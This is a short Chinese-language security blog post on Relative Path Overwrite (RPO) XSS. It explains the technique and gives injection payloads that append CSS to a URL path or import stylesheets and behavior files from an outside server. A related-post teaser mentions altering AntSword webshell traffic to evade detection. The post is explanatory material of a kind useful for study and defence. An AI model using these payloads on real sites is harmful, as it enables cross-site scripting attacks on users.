XSS:RPO(Relative Path Overwrite)攻击

  • A+
所属分类:安全博客

0x00

具体原理参考:
Infinite Security: (Relative Path Overwrite) RPO XSS
RPO Gadgets
RPO攻击

0x01

RPO攻击首先利用的是通过相对路径引入的CSS,如

<link href="styles.css" rel="stylesheet" type="text/css" />

当我们在URL最后添加

/%0a{}*{background:red;}/

的时候会发现页面执行了我们的css代码。
通过这点,我们可以做到任意加载服务器上的文件。
假若我们能控制某些文件就可以达到XSS的目的。

几个Payload:

/%0a{}@import url("http://server/style.css")/
/%0a{}img{behavior:url(http://server/test.png);}/

FROM :rickyhao.com | rickyhao.com

相关推荐: 蚁剑流量改造学习

流量分析 挂个代理直接抓包就好了 UA头修改 修改蚁剑工作目录的/modules/request.js,这里面默认是antSword/v2.1 一般需要修改一下,不然极其容易被发现,可以利用平常爬虫的一些技巧,随机构造UA头 ``` let USER_AGEN…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: